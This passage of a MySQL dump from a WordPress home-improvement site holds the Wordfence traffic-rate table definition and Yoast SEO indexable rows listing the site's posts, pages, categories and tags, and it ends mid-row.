/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
`eMin` int(10) unsigned NOT NULL,
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
`hits` int(10) unsigned NOT NULL,
PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wftrafficrates`
--
LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_indexable`
--
DROP TABLE IF EXISTS `wp_yoast_indexable`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`permalink` longtext DEFAULT NULL,
`permalink_hash` varchar(40) DEFAULT NULL,
`object_id` bigint(20) DEFAULT NULL,
`object_type` varchar(32) NOT NULL,
`object_sub_type` varchar(32) DEFAULT NULL,
`author_id` bigint(20) DEFAULT NULL,
`post_parent` bigint(20) DEFAULT NULL,
`title` text DEFAULT NULL,
`description` mediumtext DEFAULT NULL,
`breadcrumb_title` text DEFAULT NULL,
`post_status` varchar(20) DEFAULT NULL,
`is_public` tinyint(1) DEFAULT NULL,
`is_protected` tinyint(1) DEFAULT 0,
`has_public_posts` tinyint(1) DEFAULT NULL,
`number_of_pages` int(11) unsigned DEFAULT NULL,
`canonical` longtext DEFAULT NULL,
`primary_focus_keyword` varchar(191) DEFAULT NULL,
`primary_focus_keyword_score` int(3) DEFAULT NULL,
`readability_score` int(3) DEFAULT NULL,
`is_cornerstone` tinyint(1) DEFAULT 0,
`is_robots_noindex` tinyint(1) DEFAULT 0,
`is_robots_nofollow` tinyint(1) DEFAULT 0,
`is_robots_noarchive` tinyint(1) DEFAULT 0,
`is_robots_noimageindex` tinyint(1) DEFAULT 0,
`is_robots_nosnippet` tinyint(1) DEFAULT 0,
`twitter_title` text DEFAULT NULL,
`twitter_image` longtext DEFAULT NULL,
`twitter_description` longtext DEFAULT NULL,
`twitter_image_id` varchar(191) DEFAULT NULL,
`twitter_image_source` text DEFAULT NULL,
`open_graph_title` text DEFAULT NULL,
`open_graph_description` longtext DEFAULT NULL,
`open_graph_image` longtext DEFAULT NULL,
`open_graph_image_id` varchar(191) DEFAULT NULL,
`open_graph_image_source` text DEFAULT NULL,
`open_graph_image_meta` mediumtext DEFAULT NULL,
`link_count` int(11) DEFAULT NULL,
`incoming_link_count` int(11) DEFAULT NULL,
`prominent_words_version` int(11) unsigned DEFAULT NULL,
`created_at` datetime DEFAULT NULL,
`updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
`blog_id` bigint(20) NOT NULL DEFAULT 1,
`language` varchar(32) DEFAULT NULL,
`region` varchar(32) DEFAULT NULL,
`schema_page_type` varchar(64) DEFAULT NULL,
`schema_article_type` varchar(64) DEFAULT NULL,
`has_ancestors` tinyint(1) DEFAULT 0,
`estimated_reading_time_minutes` int(11) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
KEY `object_id_and_type` (`object_id`,`object_type`),
KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`)
) ENGINE=InnoDB AUTO_INCREMENT=49 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_indexable`
--
LOCK TABLES `wp_yoast_indexable` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable` DISABLE KEYS */;
INSERT INTO `wp_yoast_indexable` VALUES (1,NULL,NULL,NULL,'system-page','404',NULL,NULL,'Page not found %%sep%% %%sitename%%',NULL,'Error 404: Page not found',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-06-28 10:04:45','2021-06-28 10:04:45',1,NULL,NULL,NULL,NULL,0,NULL),(2,'https://housing-today.co.uk/','28:8a59ad352850a70e58e55ed2609f79cc',NULL,'home-page',NULL,NULL,NULL,'%%sitename%% %%page%% %%sep%% %%sitedesc%%','Transform your living space into a home','Home',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,'%%sitename%%','','','0',NULL,NULL,NULL,1,NULL,'2021-06-28 10:04:45','2021-08-24 13:31:26',1,NULL,NULL,NULL,NULL,0,NULL),(3,'https://housing-today.co.uk/blog/author/housing-today/','54:1eebd9b06149a4ab057ceffd87e16064',1,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/7754a38a98952427f0cc36a505665492?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/7754a38a98952427f0cc36a505665492?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2021-06-28 10:47:25','2021-09-16 10:48:03',1,NULL,NULL,NULL,NULL,0,NULL),(4,'https://housing-today.co.uk/blog/fibre-optic-cabling-installation/','66:f4dc61a8328ba2d6dcb6f331ce3f6a0d',94,'post','post',1,0,NULL,NULL,'Fibre Optic Cabling Installation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/06/fiber-optic-2749588_960_720.jpg',NULL,'96','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/06/fiber-optic-2749588_960_720.jpg','96','featured-image','{\"width\":960,\"height\":640,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/06/fiber-optic-2749588_960_720.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/06/fiber-optic-2749588_960_720.jpg\",\"size\":\"full\",\"id\":96,\"alt\":\"\",\"pixels\":614400,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-06-28 10:47:25','2021-08-23 10:34:55',1,NULL,NULL,NULL,NULL,0,NULL),(5,'https://housing-today.co.uk/blog/category/wiring/','49:22ca5c7639b18215f55e2c4c1a2565da',9,'term','category',NULL,NULL,NULL,NULL,'wiring',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-06-28 10:47:32','2021-08-23 10:35:04',1,NULL,NULL,NULL,NULL,0,NULL),(6,'https://housing-today.co.uk/blog/interior-design-at-home/','57:7e8cf8b99df1649f9b0976581de86dfc',1,'post','post',1,0,NULL,NULL,'Interior Design at Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2016/11/interior-design.jpg',NULL,'13','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2016/11/interior-design.jpg','13','featured-image','{\"width\":960,\"height\":576,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2016/11/interior-design.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/interior-design.jpg\",\"size\":\"full\",\"id\":13,\"alt\":\"\",\"pixels\":552960,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-06-28 10:47:46','2021-08-23 10:34:50',1,NULL,NULL,NULL,NULL,0,NULL),(7,'https://housing-today.co.uk/blog/category/interior-design/','58:3ced66fbeb45fcb6b8b302deaf1d4192',2,'term','category',NULL,NULL,NULL,NULL,'Interior Design',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-06-28 10:48:11','2021-08-23 10:35:10',1,NULL,NULL,NULL,NULL,0,NULL),(8,'https://housing-today.co.uk/blog/mortgages-remortgages-finance-suit-needs/','74:de9c0d5d508714c1b0fe04c133cc58cf',35,'post','post',1,0,NULL,NULL,'Mortgages, remortgages and finance to suit your needs','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2018/05/builder.jpg',NULL,'37','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2018/05/builder.jpg','37','featured-image','{\"width\":960,\"height\":639,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2018/05/builder.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2018/05/builder.jpg\",\"size\":\"full\",\"id\":37,\"alt\":\"\",\"pixels\":613440,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-06-28 10:48:16','2021-08-23 10:35:05',1,NULL,NULL,NULL,NULL,0,NULL),(9,'https://housing-today.co.uk/blog/category/property-development/','63:754754706be22760715ea3b7f9fd1bb3',8,'term','category',NULL,NULL,NULL,NULL,'Property Development',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-06-28 10:48:22','2021-08-23 10:35:11',1,NULL,NULL,NULL,NULL,0,NULL),(10,'https://housing-today.co.uk/blog/making-the-most-of-your-garden/','64:7504761592117c52d4dc4da4d219ec61',209,'post','post',1,0,NULL,NULL,'Making the most of your garden','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/09/garden.jpg',NULL,'215','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/09/garden.jpg','215','featured-image','{\"width\":960,\"height\":640,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/09/garden.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/09/garden.jpg\",\"size\":\"full\",\"id\":215,\"alt\":\"\",\"pixels\":614400,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-06-28 11:51:33','2021-08-28 10:42:32',1,NULL,NULL,NULL,NULL,0,NULL),(11,'https://housing-today.co.uk/blog/creating-your-perfect-kitchen/','63:a4a86a0a35957f9fde1abcefd74792fb',15,'post','post',1,0,NULL,NULL,'Creating your perfect kitchen','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2016/11/White-Modern-Kitchen.jpg',NULL,'81','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2016/11/White-Modern-Kitchen.jpg','81','featured-image','{\"width\":1024,\"height\":604,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2016/11/White-Modern-Kitchen.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/White-Modern-Kitchen.jpg\",\"size\":\"full\",\"id\":81,\"alt\":\"\",\"pixels\":618496,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-06-28 12:02:46','2021-08-23 10:35:14',1,NULL,NULL,NULL,NULL,0,NULL),(12,'https://housing-today.co.uk/blog/category/kitchen-designs/','58:0466de85b6c4ed09bb33ad179f3a3113',3,'term','category',NULL,NULL,NULL,NULL,'Kitchen Designs',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-06-28 12:02:47','2021-08-23 10:35:09',1,NULL,NULL,NULL,NULL,0,NULL),(13,NULL,NULL,NULL,'date-archive',NULL,NULL,NULL,'%%date%% %%page%% %%sep%% %%sitename%%','',NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-06-28 12:16:57','2021-06-28 12:16:57',1,NULL,NULL,NULL,NULL,0,NULL),(14,'https://housing-today.co.uk/blog/moving-home-checklist-tips-ease-stress/','72:b68427476ecdbb6cfe10f180ccce83ac',180,'post','post',1,0,NULL,NULL,'Moving home checklist: tips to ease stress','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://housing-today.co.uk/wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg',NULL,'first-content-image',NULL,NULL,NULL,NULL,'2021-06-28 12:23:50','2021-08-26 15:03:54',1,NULL,NULL,NULL,NULL,0,NULL),(15,'https://housing-today.co.uk/blog/getting-your-new-home-ready-after-a-move/','74:e97a8a8efb80c1b39cca977745674020',287,'post','post',1,0,NULL,NULL,'Getting your new home ready after a move','publish',NULL,0,NULL,NULL,NULL,'waste removal services',58,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://housing-today.co.uk/wp-content/uploads/2021/08/home-improvements.jpg',NULL,'291','featured-image',NULL,NULL,'http://housing-today.co.uk/wp-content/uploads/2021/08/home-improvements.jpg','291','featured-image','{\"width\":960,\"height\":659,\"url\":\"http://housing-today.co.uk/wp-content/uploads/2021/08/home-improvements.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2021/08/home-improvements.jpg\",\"size\":\"full\",\"id\":291,\"alt\":\"\",\"pixels\":632640,\"type\":\"image/jpeg\"}',1,NULL,NULL,'2021-08-23 09:24:36','2021-08-27 06:07:30',1,NULL,NULL,NULL,NULL,0,2),(16,'https://housing-today.co.uk/home-interior/','42:3529fcc96e7b98b2799d36d7f4164c2b',245,'post','page',1,0,NULL,NULL,'Home Interior','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:34:49','2021-08-23 10:34:49',1,NULL,NULL,NULL,NULL,0,NULL),(17,NULL,NULL,NULL,'system-page','search-result',NULL,NULL,'You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%',NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:34:51','2021-08-23 10:34:51',1,NULL,NULL,NULL,NULL,0,NULL),(18,'https://housing-today.co.uk/contact-housing-today/','50:9b811cd6430f127ebcfc78f39eeb61c4',6,'post','page',1,0,NULL,NULL,'Contact Housing Today','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:34:52','2021-08-23 10:34:52',1,NULL,NULL,NULL,NULL,0,NULL),(19,'https://housing-today.co.uk/home-interior/choosing-a-plumber/','61:971234642cf5d36443ad8cac743264f0',259,'post','page',1,245,NULL,'Read our essential tips in what you need to look out for when choosing a reliable tradesperson to carry out your plumbing needs.','Choosing a plumber','publish',NULL,0,NULL,NULL,NULL,'how to choose plumber',60,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing4.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://housing-today.co.uk/wp-content/uploads/2019/10/plumbing4.jpg',NULL,'first-content-image',NULL,NULL,NULL,NULL,'2021-08-23 10:34:53','2021-08-23 10:34:53',1,NULL,NULL,NULL,NULL,0,NULL),(20,'https://housing-today.co.uk/home-interior/home-renovations-add-value/','69:0effec1f102640ad75b8355e0f1bd31e',248,'post','page',1,245,NULL,NULL,'What home renovations add the most value?','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg',NULL,'249','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg','249','featured-image','{\"width\":2250,\"height\":1500,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/12/pexels-photo-2098443.jpeg\",\"size\":\"full\",\"id\":249,\"alt\":\"\",\"pixels\":3375000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-23 10:34:56','2021-08-23 10:34:56',1,NULL,NULL,NULL,NULL,0,NULL),(21,'https://housing-today.co.uk/blog/top-tips-purchasing-property-thailand/','71:dfb35f043e1c57f1a83d1de3d6afb3f2',135,'post','post',1,0,NULL,NULL,'Top tips for purchasing property in Thailand','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/08/nature-3336524_960_720.jpg',NULL,'140','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/08/nature-3336524_960_720.jpg','140','featured-image','{\"width\":960,\"height\":640,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/08/nature-3336524_960_720.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/nature-3336524_960_720.jpg\",\"size\":\"full\",\"id\":140,\"alt\":\"\",\"pixels\":614400,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-23 10:34:58','2021-08-23 10:35:02',1,NULL,NULL,NULL,NULL,0,NULL),(22,'https://housing-today.co.uk/blog/the-best-way-to-choose-an-electrician/','71:a9fe1517c79120d9d78ed782bb326a93',105,'post','post',1,0,NULL,NULL,'The best way to choose an electrician','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician.jpg',NULL,'121','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician.jpg','121','featured-image','{\"width\":960,\"height\":640,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician.jpg\",\"size\":\"full\",\"id\":121,\"alt\":\"\",\"pixels\":614400,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-23 10:34:58','2021-08-23 10:35:06',1,NULL,NULL,NULL,NULL,0,NULL),(23,'https://housing-today.co.uk/blog/category/home/','47:35770f9b2399c9d04386ffa2d29c319b',11,'term','category',NULL,NULL,NULL,NULL,'home',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:35:02','2021-08-23 10:35:02',1,NULL,NULL,NULL,NULL,0,NULL),(24,'https://housing-today.co.uk/blog/category/roof/','47:267d740e34f78713d0196df963564279',4,'term','category',NULL,NULL,NULL,NULL,'Roof',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:35:03','2021-08-23 10:35:03',1,NULL,NULL,NULL,NULL,0,NULL),(25,'https://housing-today.co.uk/blog/category/garden/','49:14ac79b3df6e1c3cb657da755c48b3c2',15,'term','category',NULL,NULL,NULL,NULL,'garden',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:35:03','2021-08-23 10:35:03',1,NULL,NULL,NULL,NULL,0,NULL),(26,'https://housing-today.co.uk/blog/category/exterior/','51:213ba75266b87bb7b533401ec52d4f4c',5,'term','category',NULL,NULL,NULL,NULL,'Exterior',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:35:05','2021-08-23 10:35:05',1,NULL,NULL,NULL,NULL,0,NULL),(27,'https://housing-today.co.uk/blog/category/electricity/','54:98188595f4763563c6b9de77a09ec627',10,'term','category',NULL,NULL,NULL,NULL,'Electricity',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:35:06','2021-08-23 10:35:06',1,NULL,NULL,NULL,NULL,0,NULL),(28,'https://housing-today.co.uk/blog/is-an-electrical-certificate-necessary-when-selling-your-home/','95:9b8f1f61cdb48f70e67729db7bc37e72',158,'post','post',1,0,NULL,NULL,'Is an Electrical certificate necessary when selling your home?','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg',NULL,'171','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg','171','featured-image','{\"width\":960,\"height\":639,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg\",\"size\":\"full\",\"id\":171,\"alt\":\"IS AN ELECTRICAL CERTIFICATE NECESSARY WHEN SELLING YOUR HOME?\",\"pixels\":613440,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-23 10:35:09','2021-08-23 10:35:09',1,NULL,NULL,NULL,NULL,0,NULL),(29,'https://housing-today.co.uk/blog/how-all-property-developers-benefit-from-financial-loans/','90:7c871334c293544f2e5759c174497fce',282,'post','post',1,0,NULL,NULL,'How all property developers benefit from financial loans','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2021/08/building-768815_1920.jpg',NULL,'284','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2021/08/building-768815_1920.jpg','284','featured-image','{\"width\":1920,\"height\":1279,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2021/08/building-768815_1920.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2021/08/building-768815_1920.jpg\",\"size\":\"full\",\"id\":284,\"alt\":\"property developers\",\"pixels\":2455680,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-23 10:35:13','2021-08-24 03:53:22',1,NULL,NULL,NULL,NULL,0,NULL),(30,'https://housing-today.co.uk/about-housing-today/','48:93491f597b92bd321f44b871e207478d',2,'post','page',1,0,NULL,NULL,'About Housing Today','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 10:36:50','2021-08-23 10:36:50',1,NULL,NULL,NULL,NULL,0,NULL),(31,'https://housing-today.co.uk/choose-automatic-gates-home/','56:58181118bbba2f9ad1fc57add169bcf8',88,'post','page',1,0,NULL,NULL,'Why Choose Automatic Gates for your Home?','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/05/automatic-gates.jpg',NULL,'89','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/05/automatic-gates.jpg','89','featured-image','{\"width\":960,\"height\":640,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/05/automatic-gates.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/05/automatic-gates.jpg\",\"size\":\"full\",\"id\":89,\"alt\":\"Automatic Gates\",\"pixels\":614400,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-23 10:36:53','2021-08-23 10:36:54',1,NULL,NULL,NULL,NULL,0,NULL),(32,'https://housing-today.co.uk/home-interior/add-value-privacy-home/','65:cfe08d471be7e7af444acb6d51afc8d6',242,'post','page',1,245,NULL,NULL,'How to add value and privacy to your home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg',NULL,'243','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg','243','featured-image','{\"width\":2254,\"height\":1500,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2019/12/pexels-photo-164005.jpeg\",\"size\":\"full\",\"id\":243,\"alt\":\"\",\"pixels\":3381000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-23 10:36:55','2021-08-23 10:36:55',1,NULL,NULL,NULL,NULL,0,NULL),(33,'https://housing-today.co.uk/blog/tag/loans/','43:a01f31a4f740127c75d87e36b306ae27',20,'term','post_tag',NULL,NULL,NULL,NULL,'loans',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 11:59:45','2021-08-23 11:59:45',1,NULL,NULL,NULL,NULL,0,NULL),(34,'https://housing-today.co.uk/blog/tag/clearing/','46:d0eaa2db621758e026cd9a8b3204c8cd',16,'term','post_tag',NULL,NULL,NULL,NULL,'clearing',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 12:09:12','2021-08-23 12:09:12',1,NULL,NULL,NULL,NULL,0,NULL),(35,'https://housing-today.co.uk/blog/tag/cleaning/','46:51ea854ac5a35cec0f510ca520bbe1f5',12,'term','post_tag',NULL,NULL,NULL,NULL,'cleaning',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 14:44:49','2021-08-23 14:44:49',1,NULL,NULL,NULL,NULL,0,NULL),(36,'https://housing-today.co.uk/blog/tag/new-move/','46:c388bcf4b198f140bdcfdb51eb38d1a2',25,'term','post_tag',NULL,NULL,NULL,NULL,'new move',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-23 23:32:03','2021-08-23 23:32:03',1,NULL,NULL,NULL,NULL,0,NULL),(37,'https://housing-today.co.uk/blog/tag/property-developers/','57:f8e3c92c36bc003eea71660d025cda07',19,'term','post_tag',NULL,NULL,NULL,NULL,'property developers',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-24 03:53:22','2021-08-24 03:53:22',1,NULL,NULL,NULL,NULL,0,NULL),(38,'https://housing-today.co.uk/blog/tag/advice/','44:33ceb768c6a2f89ea5ddc705f5cd2e34',18,'term','post_tag',NULL,NULL,NULL,NULL,'advice',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-24 10:56:10','2021-08-24 